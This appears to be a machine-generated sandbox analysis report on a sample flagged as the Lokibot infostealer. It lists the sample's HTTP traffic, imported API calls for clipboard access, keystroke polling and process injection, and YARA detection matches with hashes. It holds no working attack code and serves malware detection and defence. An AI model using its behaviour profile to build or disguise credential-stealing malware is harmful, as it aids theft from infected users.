Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 14:08:11 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iOpFsCUuwvCmZRousqGfoin1Lhb1nwCctbl6veEKpJ5DaSINNV3Vb0ho%2B72y3NAoNX%2B8Eaz%2F814i6skbkLOSLpH8C6pxBImsAGaPxQbsemDybI4slUD1dsBM0eQ%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914f1135bd48c339-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1489&min_rtt=1489&rtt_var=744&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 14:08:13 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lpr%2FP%2BED8VaU1lOHtHFE2J23BngsOHgMFXPrYrPuKeE4RMlr%2Bqj%2Bg0KijZoUIO7%2F9tTF478jZ52xJW9TWLYUfSyuVhK%2F7QOJAp5yD9az3Zz%2Fc%2BvJGSC3bgtRcoE%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914f11424f7eefa7-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1952&min_rtt=1952&rtt_var=976&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=211&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 14:08:15 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oGmdSZgxRuFOFeMOEdJBgHc%2FjetuQiqn2Hi%2FbPqikfRDuWxHlfW%2FgyjcHktq70Ki9YuuyOLHVPeNTPz87vqcLzZ8POng0rCFi2EjmBA3kdUfnBWXHORCKLmLUsU%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914f114eb9dec3fd-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1661&min_rtt=1661&rtt_var=830&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=176&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 14:08:17 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3heaPNOqSOIToDd7kH0Xry8ErVJDB70OeLtfBvaAf%2FpLp1eqNn6AwZaunYK25V5cbxSX59XWkbTZNOzx7BqrDfJK3mVF4k482VLXnj4YeQmJPkFTDxp%2Fu%2BWXTZQ%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914f115b7cb9c352-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1583&min_rtt=1583&rtt_var=791&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=219&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 14:08:29 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Tfb22Y14ko2Fo%2BEeTm38iznsUbmLOyWW0Nn6IGAgls5AhjBckCnxIn6CXclQMkYPWyXebUaWXMINY73%2BvisNUOUVAVlRU7U7Tjw31OGKFd%2BzjVbwOYirAlmRXWk%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914f11a449627d0b-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2026&min_rtt=2026&rtt_var=1013&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 14:08:31 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sJ2k5JRKXYcWF5s0SChbLgr63NE7sPcbcySGJzdgllDQSrVMoHSVTcFRO8q3AacC3Y%2BjDeAlGKm2OY7uNcKhADLAwCp%2BJeQksYZT9hZtP1tkVpqTkNZcprAWQfs%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914f11b0be5e6a56-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2172&min_rtt=2172&rtt_var=1086&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=206&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 14:08:33 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Zp1IIJYO5VmYSbsPRlCo2wam%2Bv%2F3E3A1fUOJYr3Q9YSGrJ8xwhsFdxPVGL5%2BhGmViHNTJadsQiNWPuQkvLAX9Z8ow4ERRV%2FZFQWReSGc7AaOs%2FwaFDp%2BuZayiwA%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914f11bd2b58728a-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1966&min_rtt=1966&rtt_var=983&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=225&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Source: svchost.exe, svchost.exe, 00000002.00000002.3383578074.0000000000400000.00000040.80000000.00040000.00000000.sdmp

String found in binary or memory: http://www.ibsensoftware.com/

Source: C:\Users\user\Desktop\dfiCWCanbj.exe

Code function: 0_2_00BA4164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_00BA4164

Source: C:\Users\user\Desktop\dfiCWCanbj.exe

Code function: 0_2_00BA4164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_00BA4164

Source: C:\Users\user\Desktop\dfiCWCanbj.exe

Code function: 0_2_00BA3F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_00BA3F66

Source: C:\Users\user\Desktop\dfiCWCanbj.exe

Code function: 0_2_00B9001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

0_2_00B9001C

Source: C:\Users\user\Desktop\dfiCWCanbj.exe

Code function: 0_2_00BBCABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

0_2_00BBCABC

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.dfiCWCanbj.exe.3bf0000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.dfiCWCanbj.exe.3bf0000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.dfiCWCanbj.exe.3bf0000.1.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.dfiCWCanbj.exe.3bf0000.1.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.dfiCWCanbj.exe.3bf0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.dfiCWCanbj.exe.3bf0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.dfiCWCanbj.exe.3bf0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.dfiCWCanbj.exe.3bf0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.dfiCWCanbj.exe.3bf0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 2.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 2.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 2.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 2.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 2.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 2.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 2.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 2.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000000.00000002.2150829579.0000000003BF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000000.00000002.2150829579.0000000003BF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000000.00000002.2150829579.0000000003BF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki Payload Author: kevoreilly
Source: 00000000.00000002.2150829579.0000000003BF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.2150829579.0000000003BF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000002.00000002.3383578074.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000002.00000002.3383578074.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000002.00000002.3383578074.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Loki Payload Author: kevoreilly
Source: 00000002.00000002.3383578074.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.3383578074.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: Process Memory Space: dfiCWCanbj.exe PID: 3580, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: Process Memory Space: svchost.exe PID: 3968, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown

Binary is likely a compiled AutoIt script file

Source: C:\Users\user\Desktop\dfiCWCanbj.exe	Code function: This is a third-party compiled AutoIt script.	0_2_00B33B3A
Source: dfiCWCanbj.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: dfiCWCanbj.exe, 00000000.00000002.2149246732.0000000000BE4000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_18604d99-4
Source: dfiCWCanbj.exe, 00000000.00000002.2149246732.0000000000BE4000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_9b5bcdd8-0
Source: dfiCWCanbj.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_29f35b09-1
Source: dfiCWCanbj.exe	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_d6072727-3

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00332720 RegOpenKeyExW,RegOpenKeyExW,RegOpenKeyExW,RegCloseKey,RegCloseKey,HeapAlloc,RegQueryValueExW,ExpandEnvironmentStringsW,LCMapStringW,RegQueryValueExW,HeapFree,AcquireSRWLockShared,ReleaseSRWLockShared,HeapAlloc,memcpy,memcpy,AcquireSRWLockExclusive,ReleaseSRWLockExclusive,RegGetValueW,ActivateActCtx,LoadLibraryExW,MultiByteToWideChar,RtlRunOnceExecuteOnce,NtQuerySystemInformation,GetProcAddress,DeactivateActCtx,ActivateActCtx,MultiByteToWideChar,RtlRunOnceExecuteOnce,NtQuerySystemInformation,GetProcAddress,DeactivateActCtx,ActivateActCtx,MultiByteToWideChar,RtlRunOnceExecuteOnce,NtQuerySystemInformation,GetProcAddress,DeactivateActCtx,RegCloseKey,HeapAlloc,RegGetValueW,WideCharToMultiByte,HeapAlloc,WideCharToMultiByte,HeapFree,ExpandEnvironmentStringsW,HeapFree,CreateActCtxW,GetLastError,HeapFree,HeapFree,GetLastError,CreateActCtxW,GetLastError,ReleaseActCtx,GetLastError,GetLastError,RtlNtStatusToDosError,GetLastError,LoadLibraryExW,RtlNtStatusToDosError,LoadLibraryExW,RtlNtStatusToDosError,HeapFree,ReleaseActCtx,	2_2_00332720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00333540 RtlImageNtHeader,RpcMgmtSetServerStackSize,I_RpcServerDisableExceptionFilter,RtlSetProcessIsCritical,SetProcessMitigationPolicy,SetProcessMitigationPolicy,SetProcessMitigationPolicy,SetProtectedPolicy,HeapSetInformation,NtSetInformationProcess,	2_2_00333540
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_003333C0 NtSetInformationProcess,SetUnhandledExceptionFilter,SetErrorMode,GetProcessHeap,InitializeSRWLock,InitializeSRWLock,RegDisablePredefinedCacheEx,EtwEventRegister,GetCommandLineW,memset,GetCurrentProcess,NtSetInformationProcess,HeapFree,HeapFree,ExitProcess,GetCurrentProcess,SetProcessAffinityUpdateMode,	2_2_003333C0

Source: C:\Users\user\Desktop\dfiCWCanbj.exe

Code function: 0_2_00B9A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,

0_2_00B9A1EF

Source: C:\Users\user\Desktop\dfiCWCanbj.exe

Code function: 0_2_00B88310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_00B88310

Source: C:\Users\user\Desktop\dfiCWCanbj.exe

Code function: 0_2_00B951BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

0_2_00B951BD

Source: C:\Users\user\Desktop\dfiCWCanbj.exe	Code function: 0_2_00B3E6A0	0_2_00B3E6A0
Source: C:\Users\user\Desktop\dfiCWCanbj.exe	Code function: 0_2_00B5D975	0_2_00B5D975
Source: C:\Users\user\Desktop\dfiCWCanbj.exe	Code function: 0_2_00B521C5	0_2_00B521C5
Source: C:\Users\user\Desktop\dfiCWCanbj.exe	Code function: 0_2_00B662D2	0_2_00B662D2
Source: C:\Users\user\Desktop\dfiCWCanbj.exe	Code function: 0_2_00BB03DA	0_2_00BB03DA
Source: C:\Users\user\Desktop\dfiCWCanbj.exe	Code function: 0_2_00B6242E	0_2_00B6242E
Source: C:\Users\user\Desktop\dfiCWCanbj.exe	Code function: 0_2_00B525FA	0_2_00B525FA
Source: C:\Users\user\Desktop\dfiCWCanbj.exe	Code function: 0_2_00B466E1	0_2_00B466E1
Source: C:\Users\user\Desktop\dfiCWCanbj.exe	Code function: 0_2_00B8E616	0_2_00B8E616
Source: C:\Users\user\Desktop\dfiCWCanbj.exe	Code function: 0_2_00B6878F	0_2_00B6878F
Source: C:\Users\user\Desktop\dfiCWCanbj.exe	Code function: 0_2_00B98889	0_2_00B98889
Source: C:\Users\user\Desktop\dfiCWCanbj.exe	Code function: 0_2_00B48808	0_2_00B48808
Source: C:\Users\user\Desktop\dfiCWCanbj.exe	Code function: 0_2_00BB0857	0_2_00BB0857
Source: C:\Users\user\Desktop\dfiCWCanbj.exe	Code function: 0_2_00B66844	0_2_00B66844
Source: C:\Users\user\Desktop\dfiCWCanbj.exe	Code function: 0_2_00B5CB21	0_2_00B5CB21
Source: C:\Users\user\Desktop\dfiCWCanbj.exe	Code function: 0_2_00B66DB6	0_2_00B66DB6
Source: C:\Users\user\Desktop\dfiCWCanbj.exe	Code function: 0_2_00B46F9E	0_2_00B46F9E
Source: C:\Users\user\Desktop\dfiCWCanbj.exe	Code function: 0_2_00B43030	0_2_00B43030
Source: C:\Users\user\Desktop\dfiCWCanbj.exe	Code function: 0_2_00B53187	0_2_00B53187
Source: C:\Users\user\Desktop\dfiCWCanbj.exe	Code function: 0_2_00B5F1D9	0_2_00B5F1D9
Source: C:\Users\user\Desktop\dfiCWCanbj.exe	Code function: 0_2_00B31287	0_2_00B31287
Source: C:\Users\user\Desktop\dfiCWCanbj.exe	Code function: 0_2_00B51484	0_2_00B51484
Source: C:\Users\user\Desktop\dfiCWCanbj.exe	Code function: 0_2_00B45520	0_2_00B45520
Source: C:\Users\user\Desktop\dfiCWCanbj.exe	Code function: 0_2_00B57696	0_2_00B57696
Source: C:\Users\user\Desktop\dfiCWCanbj.exe	Code function: 0_2_00B45760	0_2_00B45760
Source: C:\Users\user\Desktop\dfiCWCanbj.exe	Code function: 0_2_00B51978	0_2_00B51978
Source: C:\Users\user\Desktop\dfiCWCanbj.exe	Code function: 0_2_00B69AB5	0_2_00B69AB5
Source: C:\Users\user\Desktop\dfiCWCanbj.exe	Code function: 0_2_00B3FCE0	0_2_00B3FCE0
Source: C:\Users\user\Desktop\dfiCWCanbj.exe	Code function: 0_2_00B5BDA6	0_2_00B5BDA6
Source: C:\Users\user\Desktop\dfiCWCanbj.exe	Code function: 0_2_00B51D90	0_2_00B51D90
Source: C:\Users\user\Desktop\dfiCWCanbj.exe	Code function: 0_2_00BB7DDB	0_2_00BB7DDB
Source: C:\Users\user\Desktop\dfiCWCanbj.exe	Code function: 0_2_00B43FE0	0_2_00B43FE0
Source: C:\Users\user\Desktop\dfiCWCanbj.exe	Code function: 0_2_00B3DF00	0_2_00B3DF00
Source: C:\Users\user\Desktop\dfiCWCanbj.exe	Code function: 0_2_00DF3600	0_2_00DF3600
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00332720	2_2_00332720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040549C	2_2_0040549C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004029D4	2_2_004029D4

Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 0041219C appears 45 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 00405B6F appears 42 times
Source: C:\Users\user\Desktop\dfiCWCanbj.exe	Code function: String function: 00B37DE1 appears 36 times
Source: C:\Users\user\Desktop\dfiCWCanbj.exe	Code function: String function: 00B50AE3 appears 70 times
Source: C:\Users\user\Desktop\dfiCWCanbj.exe	Code function: String function: 00B58900 appears 42 times

Source: dfiCWCanbj.exe, 00000000.00000003.2141548342.0000000003DE3000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs dfiCWCanbj.exe
Source: dfiCWCanbj.exe, 00000000.00000003.2138697881.0000000003EDD000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs dfiCWCanbj.exe

Source: dfiCWCanbj.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: 0.2.dfiCWCanbj.exe.3bf0000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.dfiCWCanbj.exe.3bf0000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.dfiCWCanbj.exe.3bf0000.1.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.dfiCWCanbj.exe.3bf0000.1.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.dfiCWCanbj.exe.3bf0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.dfiCWCanbj.exe.3bf0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.dfiCWCanbj.exe.3bf0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.dfiCWCanbj.exe.3bf0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.dfiCWCanbj.exe.3bf0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 2.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
